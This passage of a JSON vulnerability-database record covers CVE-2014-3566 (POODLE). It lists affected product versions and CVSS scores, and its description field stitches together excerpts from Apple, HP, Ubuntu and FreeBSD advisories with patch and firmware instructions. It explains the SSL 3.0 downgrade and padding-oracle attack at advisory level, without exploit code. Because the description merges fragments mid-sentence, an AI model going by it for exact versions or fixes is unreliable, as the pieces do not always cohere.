true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.0.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.0.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.3.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.1.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.2.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.1.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.1.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.1.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.3.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.1.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.3.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.2.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.1.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.1.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.0.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.1.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.0.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.1.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.0.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.1.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.0:beta:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.1.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.0.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:6.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:database:12.1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:database:11.2.0.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3566" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "129426" }, { "db": "PACKETSTORM", "id": "133368" }, { "db": "PACKETSTORM", "id": "130644" }, { "db": "PACKETSTORM", "id": "131011" }, { "db": "PACKETSTORM", "id": "130334" }, { "db": "PACKETSTORM", "id": "130817" }, { "db": "PACKETSTORM", "id": "136577" }, { "db": "PACKETSTORM", "id": "129401" }, { "db": "PACKETSTORM", "id": "132469" } ], "trust": 0.9 }, "cve": "CVE-2014-3566", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-71506", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 3.4, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "exploitabilityScore": 1.6, "impactScore": 1.4, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N", "version": "3.1" } ], "severity": [ { "author": "NVD", "id": "CVE-2014-3566", "trust": 1.0, "value": "LOW" }, { "author": "VULHUB", "id": "VHN-71506", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-71506" }, { "db": "NVD", "id": "CVE-2014-3566" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the \"POODLE\" issue. SSL protocol is the abbreviation of Secure Socket Layer protocol (Secure Socket Layer) developed by Netscape, which provides security and data integrity guarantee for Internet communication. There is a security vulnerability in the SSL protocol 3.0 version used in OpenSSL 1.0.1i and earlier versions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2014-10-16-4 OS X Server v3.2.2\n\nOS X Server v3.2.2 is now available and addresses the following:\n\nServer\nAvailable for: OS X Mavericks v10.9.5 or later\nImpact: An attacker may be able to decrypt data protected by SSL\nDescription: There are known attacks on the confidentiality of SSL\n3.0 when a cipher suite uses a block cipher in CBC mode. An attacker\ncould force the use of SSL 3.0, even when the server would support a\nbetter TLS version, by blocking TLS 1.0 and higher connection\nattempts. This issue was addressed by disabling SSL 3.0 support in\nWeb Server, Calendar \u0026 Contacts Server, and Remote Administration. \nCVE-ID\nCVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of\nGoogle Security Team\n\n\nOS X Server v3.2.2 may be obtained from the Mac App Store. \nHP Storage Data Protector Cell Manager v8 before v8.13_206 and v9 before\nv9.03MMR running on HP-UX 11i, Windows Server 2008/2008R2/2012/2012R2,\nRedhat, CentOS, Oracle Linux, and SUSE Linux_x64. ============================================================================\nUbuntu Security Notice USN-2486-1\nJanuary 27, 2015\n\nopenjdk-6 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK 6. \n\nSoftware Description:\n- openjdk-6: Open Source Java implementation\n\nDetails:\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure, data integrity and availability. An attacker could exploit these to expose sensitive\ndata over the network. An attacker could exploit this to\nexpose sensitive data over the network. (CVE-2014-6593)\n\nA vulnerability was discovered in the OpenJDK JRE related to integrity and\navailability. \n(CVE-2015-0383)\n\nA vulnerability was discovered in the OpenJDK JRE related to availability. \n(CVE-2015-0410)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n icedtea-6-jre-cacao 6b34-1.13.6-1ubuntu0.12.04.1\n icedtea-6-jre-jamvm 6b34-1.13.6-1ubuntu0.12.04.1\n openjdk-6-jre 6b34-1.13.6-1ubuntu0.12.04.1\n openjdk-6-jre-headless 6b34-1.13.6-1ubuntu0.12.04.1\n openjdk-6-jre-lib 6b34-1.13.6-1ubuntu0.12.04.1\n openjdk-6-jre-zero 6b34-1.13.6-1ubuntu0.12.04.1\n\nUbuntu 10.04 LTS:\n icedtea-6-jre-cacao 6b34-1.13.6-1ubuntu0.10.04.1\n openjdk-6-jre 6b34-1.13.6-1ubuntu0.10.04.1\n openjdk-6-jre-headless 6b34-1.13.6-1ubuntu0.10.04.1\n openjdk-6-jre-lib 6b34-1.13.6-1ubuntu0.10.04.1\n openjdk-6-jre-zero 6b34-1.13.6-1ubuntu0.10.04.1\n\nThis update uses a new upstream release, which includes additional bug\nfixes. After a standard system update you need to restart any Java\napplications or applets to make all the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2486-1\n CVE-2014-3566, CVE-2014-6585, CVE-2014-6587, CVE-2014-6591,\n CVE-2014-6593, CVE-2014-6601, CVE-2015-0383, CVE-2015-0395,\n CVE-2015-0400, CVE-2015-0407, CVE-2015-0408, CVE-2015-0410,\n CVE-2015-0412\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/openjdk-6/6b34-1.13.6-1ubuntu0.12.04.1\n https://launchpad.net/ubuntu/+source/openjdk-6/6b34-1.13.6-1ubuntu0.10.04.1\n. A second vulnerability could be exploited remotely\nto cause a Denial of Service (DoS). \n\nContact vcemsdksupportteam@hp.com to request the HP Virtual Connect\nEnterprise Manager SDK v7.4.1 or later. The\nvulnerabilities may lead to remote disclosure of information. \n\nThe update is available from HPE Software Depot: https://h20392.www2.hpe.com/\nportal/swdepot/displayProductInfo.do?productNumber=HPVPRhttps://www.hpe.com\n\nNote: HPE recommends customers using OV4VC 7.8.1 and earlier should upgrade\nto OV4VC 7.8.2. This addresses all SSL security vulnerabilities reported\nthrough March 28, 2016. \n\nSSLv3 is enabled by default in all version 5 HP Insight Remote Support\nClients. HP recommends that customers, if possible, should\nmigrate to Insight Remote Support Version 7.2 which has been updated with a\npreliminary resolution to the vulnerability. This bulletin will be revised\nwhen the final resolution update is available. \n\n Please refer to the following Insight Remote Support Version 7.2 documents\nfor recommendations on migrating to Insight Remote Support Version 7.2:\n\n http://www.hp.com/go/insightremotesupport/docs\n\n HP Insight Remote Support 7.2 Upgrade Guide\n HP Insight Remote Support 7.2 Release Notes\n\nHISTORY\nVersion:1 (rev.1) - 5 December 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=============================================================================\nFreeBSD-SA-14:23.openssl Security Advisory\n The FreeBSD Project\n\nTopic: OpenSSL multiple vulnerabilities\n\nCategory: contrib\nModule: openssl\nAnnounced: 2014-10-21\nAffects: All supported versions of FreeBSD. \nCorrected: 2014-10-15 19:59:43 UTC (stable/10, 10.1-PRERELEASE)\n 2014-10-21 19:00:32 UTC (releng/10.1, 10.1-RC3)\n 2014-10-21 19:00:32 UTC (releng/10.1, 10.1-RC2-p1)\n 2014-10-21 19:00:32 UTC (releng/10.1, 10.1-RC1-p1)\n 2014-10-21 19:00:32 UTC (releng/10.1, 10.1-BETA3-p1)\n 2014-10-21 20:21:10 UTC (releng/10.0, 10.0-RELEASE-p10)\n 2014-10-15 20:28:31 UTC (stable/9, 9.3-STABLE)\n 2014-10-21 20:21:10 UTC (releng/9.3, 9.3-RELEASE-p3)\n 2014-10-21 20:21:10 UTC (releng/9.2, 9.2-RELEASE-p13)\n 2014-10-21 20:21:10 UTC (releng/9.1, 9.1-RELEASE-p20)\n 2014-10-15 20:28:31 UTC (stable/8, 8.4-STABLE)\n 2014-10-21 20:21:27 UTC (releng/8.4, 8.4-RELEASE-p17)\nCVE Name: CVE-2014-3513, CVE-2014-3566, CVE-2014-3567, CVE-2014-3568\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e. \n\nI. Background\n\nFreeBSD includes software from the OpenSSL Project. The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured\nOpen Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nII. Problem Description\n\nA flaw in the DTLS SRTP extension parsing code allows an attacker, who\nsends a carefully crafted handshake message, to cause OpenSSL to fail\nto free up to 64k of memory causing a memory leak. [CVE-2014-3513]. \n\nWhen an OpenSSL SSL/TLS/DTLS server receives a session ticket the\nintegrity of that ticket is first verified. In the event of a session\nticket integrity check failing, OpenSSL will fail to free memory\ncausing a memory leak. [CVE-2014-3567]. This\nprotocol weakness makes it possible for an attacker to obtain clear text\ndata through a padding-oracle attack. \n\nSome client applications (such as browsers) will reconnect using a\ndowngraded protocol to work around interoperability bugs in older\nservers. This could be exploited by an active man-in-the-middle to\ndowngrade connections to SSL 3.0 even if both sides of the connection\nsupport higher protocols. SSL 3.0 contains a number of weaknesses\nincluding POODLE [CVE-2014-3566]. \n\nOpenSSL has added support for TLS_FALLBACK_SCSV to allow applications\nto block the ability for a MITM attacker to force a protocol downgrade. \n\nWhen OpenSSL is configured with \"no-ssl3\" as a build option, servers\ncould accept and complete a SSL 3.0 handshake, and clients could be\nconfigured to send them. [CVE-2014-3568]. \n\nIII. Impact\n\nA remote attacker can cause Denial of Service with OpenSSL 1.0.1\nserver implementations for both SSL/TLS and DTLS regardless of\nwhether SRTP is used or configured. [CVE-2014-3513]\n\nBy sending a large number of invalid session tickets an attacker\ncould exploit this issue in a Denial Of Service attack. \n[CVE-2014-3567]. \n\nAn active man-in-the-middle attacker can force a protocol downgrade\nto SSLv3 and exploit the weakness of SSLv3 to obtain clear text data\nfrom the connection. [CVE-2014-3566] [CVE-2014-3568]\n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.0]\n# fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-10.0.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-10.0.patch.asc\n# gpg --verify openssl-10.0.patch.asc\n\n[FreeBSD 9.3]\n# fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-9.3.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-9.3.patch.asc\n# gpg --verify openssl-9.3.patch.asc\n\n[FreeBSD 8.4, 9.1 and 9.2]\n# fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-8.4.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-8.4.patch.asc\n# gpg --verify openssl-8.4.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:http://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r273151\nreleng/8.4/ r273416\nstable/9/ r273151\nreleng/9.1/ r273415\nreleng/9.2/ r273415\nreleng/9.3/ r273415\nstable/10/ r273149\nreleng/10.0/ r273415\nreleng/10.1/ r273399\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:http://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. References\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\u003e\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\u003e\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\u003e\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\u003e\n\nThe latest revision of this advisory is available at\n\u003cURL:http://security.FreeBSD.org/advisories/FreeBSD-SA-14:23.openssl.asc\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIcBAEBAgAGBQJURsSwAAoJEO1n7NZdz2rn3ekQANG9DnAGJq/yAXXtX4wdeP08\nEp35L3dkxJsthoqJhn7fc/pra5SZ5iS7NCRHdh5Xn1dsxRiOsffYt9zanWyTOgj+\nRQy9jiNp0oIWQEkxZVoHMIKn6VeQk1I2llSXyERANjeDtKX6GV2gV+Zd4tcExW4T\nNn9jVHgkDL/doxJ3C1K0BrkdoEEwyPohAf8WLAg6ZKRm3Pys1Ewjm6fPBPtKUIEu\nzWFruP5xFz3rM6i/4zcihj7b4BuIKtUBgHf28rgf0I3TKZTr75Xr9h4q/8ZG4H0G\nLk/1OoZTiMyjlBLufpTlCOdODjz7ORzDLif47Zyt52iZowq1hl4WO7Xo/C/kPUmG\no631wsLmO9tPS2Z0TmIQm1fwjlTvIZefZAlMpa1lDwnwZx2hRsu9TzauACdSbuWx\n9i+e8/CSMEsr0qJo8KXjltpV9siULhkvl9xr3PwxMfvHFjGUAuur2zHUoTQZTpy0\nnKJJXSs3kIW/4ivLMDuDYijdVnf4hrih6GTKEND6aNXtyXitiFK8J4a/q0T4BBnh\n89A2QUFVeeDPmf7jzMh824s8W2uoPFGJqHgdtqv1bLT29rqh5ya/5zi7sci6Q/Mk\nov0U8X3Pwun7iwJDeYG6N38lUSdMqImHR12Ay7pOY04i4qau4Yf8B26lwcMk/HrU\ncZ84y1sCp0qHtTqKuak9\n=ywze\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04720842\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04720842\nVersion: 1\n\nHPSBPI03107 rev.1 - HP LaserJet Printers and MFPs, HP OfficeJet Printers and\nMFPs, and HP JetDirect Networking cards using OpenSSL, Remote Disclosure of\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-06-26\nLast Updated: 2015-06-26\n\nPotential Security Impact: Remote disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with certain HP\nLaserJet Printers and MFPs, certain HP OfficeJet Printers and MFPs, and\ncertain HP JetDirect Networking cards using OpenSSL. This is the SSLv3\nvulnerability known as \"Padding Oracle on Downgraded Legacy Encryption\" or\n\"POODLE\", which could be exploited remotely to allow disclosure of\ninformation. \n\nReferences:\n\nCVE-2014-3566 (SSRT101114)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nPlease refer to the RESOLUTION\n below for a list of impacted products. \n\nNote: all product versions are impacted prior to the fixed versions listed. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\nHP has provided firmware updates for impacted printers as in the table below. \nTo obtain the updated firmware, go to www.hp.com and follow these steps:\n\nSelect \"Drivers \u0026 Software\". \nEnter the appropriate product name listed in the table below into the search\nfield. \nClick on \"Search\". \nClick on the appropriate product. \nUnder \"Select operating system\" click on \"Cross operating system (BIOS,\nFirmware, Diagnostics, etc.)\"\nNote: If the \"Cross operating system ...\" link is not present, select\napplicable Windows operating system from the list. \nSelect the appropriate firmware update under \"Firmware\". \n\nFirmware Updates Table\n\nProduct Name\n Model Number\n Firmware Revision\n\nHP Color LaserJet CP5525\n CE707A,CE708A,CE709A\n 2305081_000127 (or higher)\n\nHP Color LaserJet Enterprise M552\n B5L23A\n 2305076_518484 (or higher)\n\nHP Color LaserJet Enterprise M553\n B5L24A, B5L25A, B5L26A\n 2305076_518484 (or higher)\n\nHP Color LaserJet Enterprise M651\n CZ255A, CZ256A, CZ257A, CZ258A\n 2305076_518492 (or higher)\n\nHP Color LaserJet Enterprise M750\n D3L08A, D3L09A, D3L10A\n 2305081_000144 (or higher)\n\nHP Color LaserJet M680\n CZ250A, CA251A\n 2305076_518489 (or higher)\n\nHP LaserJet Enterprise 500 color MFP M575dn\n CD644A, CD645A\n 2305076_518499 (or higher)\n\nHP LaserJet Enterprise 500 MFP M525f\n CF116A, CF117A\n 2305076_518487 (or higher)\n\nHP LaserJet Enterprise 600 M601\n CE989A, CE990A\n 2305083_000199 (or higher)\n\nHP LaserJet Enterprise 600 M602\n CE991A, CE992A, CE993A\n 2305083_000199 (or higher)\n\nHP LaserJet Enterprise 600 M603xh\n CE994A, CE995A, CE996A\n 2305083_000199 (or higher)\n\nHP LaserJet Enterprise 700 color MFP M775 series\n CC522A, CC523A, CC524A\n 2305076_518498 (or higher)\n\nHP LaserJet Enterprise 700 M712xh\n CF235A, CF236A, CF238A\n 2305083_000196 (or higher)\n\nHP LaserJet Enterprise 800 color M855\n A2W77A, A2W78A, A2W79A\n 2305076_518493 (or higher)\n\nHP LaserJet Enterprise 800 color MFP M880\n A2W76A, A2W75A, D7P70A, D7P71A\n 2305076_518488 (or higher)\n\nHP LaserJet Enterprise Color 500 M551 Series\n CF081A,CF082A,CF083A\n 2305083_000200 (or higher)\n\nHP LaserJet Enterprise Color flow MFP M575c\n CD646A\n 2305076_518499 (or higher)\n\nHP LaserJet Enterprise flow M830z MFP\n CF367A\n 2305076_518490 (or higher)\n\nHP LaserJet Enterprise flow MFP M525c\n CF118A\n 2305076_518487 (or higher)\n\nHP LaserJet Enterprise Flow MFP M630z\n B3G85A\n 2305076_518483 (or higher)\n\nHP LaserJet Enterprise M4555 MFP\n CE503A, CE504A, CE738A\n 2305083_000222 (or higher)\n\nHP Color LaserJet CM4540 MFP\n CC419A, CC420A, CC421A\n 2305083_000206 (or higher)\n\nHP LaserJet Enterprise M604\n E6B67A, E6B68A\n 2305076_518485 (or higher)\n\nHP LaserJet Enterprise M605\n E6B69A, E6B70A. E6B71A\n 2305076_518485 (or higher)\n\nHP LaserJet Enterprise M606\n E6B72A, E6B73A\n 2305076_518485 (or higher)\n\nHP LaserJet Enterprise M806\n CZ244A, CZ245A\n 2305081_000143 (or higher)\n\nHP LaserJet Enterprise MFP M630\n J7X28A\n 2305076_518483 (or higher)\n\nHP LaserJet Enterprise MFP M725\n CF066A, CF067A, CF068A, CF069A\n 2305076_518496 (or higher)\n\nHP Scanjet Enterprise 8500FN1 Document Capture Workstation\n L2717A\n 2305076_518479 (or higher)\n\nHP OfficeJet Enterprise Color X555\n C2S11A, C2S12A\n 2305076_518491 (or higher)\n\nHP OfficeJet Enterprise Color MFP X585\n B5L04A, B5L05A,B5L07A\n 2305076_518486 (or higher)\n\nHP LaserJet P3005\n Q7812A\n 02.190.3 (or higher)\n\nHP Color LaserJet CP3505\n CB442A\n 03.160.2 (or higher)\n\nHP LaserJet 5200L\n Q7543A\n 08.241.0 (or higher)\n\nHP LaserJet 5200N\n Q7543A\n 08.241.0 (or higher)\n\nHP LaserJet 4240\n Q7785A\n 08.250.2 (or higher)\n\nHP LaserJet 4250\n Q5400A\n 08.250.2 (or higher)\n\nHP LaserJet 4350\n Q5407A\n 08.250.2 (or higher)\n\nHP LaserJet 9040\n Q7697A\n 08.260.3 (or higher)\n\nHP LaserJet 9050\n Q7697A\n 08.260.3 (or higher)\n\nHP LaserJet 9040 Multifunction Printer\n Q3721A\n 08.290.2 (or higher)\n\nHP LaserJet 9050 Multifunction Printer\n Q3721A\n 08.290.2 (or higher)\n\nHP 9200c Digital Sender\n Q5916A\n 09.271.3 (or higher)\n\nHP LaserJet 4345 Multifunction Printer\n Q3942A\n 09.310.2 (or higher)\n\nHP LaserJet P2055 Printer\n CE456A, CE457A, CE459A, CE460A,\n 20141201 (or higher)\n\nHP Color LaserJet 3000\n Q7534A\n 46.080.2 (or higher)\n\nHP Color LaserJet 3800\n Q5981A\n 46.080.8 (or higher)\n\nHP Color LaserJet 4700\n Q7492A\n 46.230.6 (or higher)\n\nHP Color LaserJet CP4005\n CB503A\n 46.230.6 (or higher)\n\nHP Color LaserJet 4730 Multifunction Printer\n Q7517A\n 46.380.3 (or higher)\n\nHP LaserJet Pro 200 color Printer M251n, nw\n CF146A, CF147A\n 20150112 (or higher)\n\nHP LaserJet Pro 500 color MFP M570dn, dw\n 